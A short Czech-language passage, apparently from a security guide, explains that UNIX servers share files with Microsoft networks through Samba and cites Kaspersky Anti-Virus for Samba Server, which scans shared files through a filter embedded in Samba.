Na rozdíl od serverů Novell, kde je podpora společnosti Microsoft vestavěnou funkcí, server UNIX není upraven pro odesílání souborů pomocí protokolu SMB / CIFS. Pro tento účel se používá speciální softwarový balíček - Samba, který umožňuje vytvářet obecné zdroje kompatibilní s sítí společnosti Microsoft.

Pokud se vyskytne sdílení souborů pouze protokoly SMB / CIFS, to samozřejmě nemá smysl řídit všechny operace souborů, stačí kontrolovat pouze soubory přenášené pomocí serveru Samba.

Příklad. V řadě produktů společnosti Kaspersky Lab, existuje speciální řešení - Kaspersky Anti-Virus pro Samba Server, navržený speciálně pro ochranu veřejných složek vytvořených na serverech UNIX pomocí Samby. V tomto produktu neexistuje žádný modul, který řídí operace souborů, filtr se používá místo toho, vložený do SAMBA a zachycení všech přenášených souborů.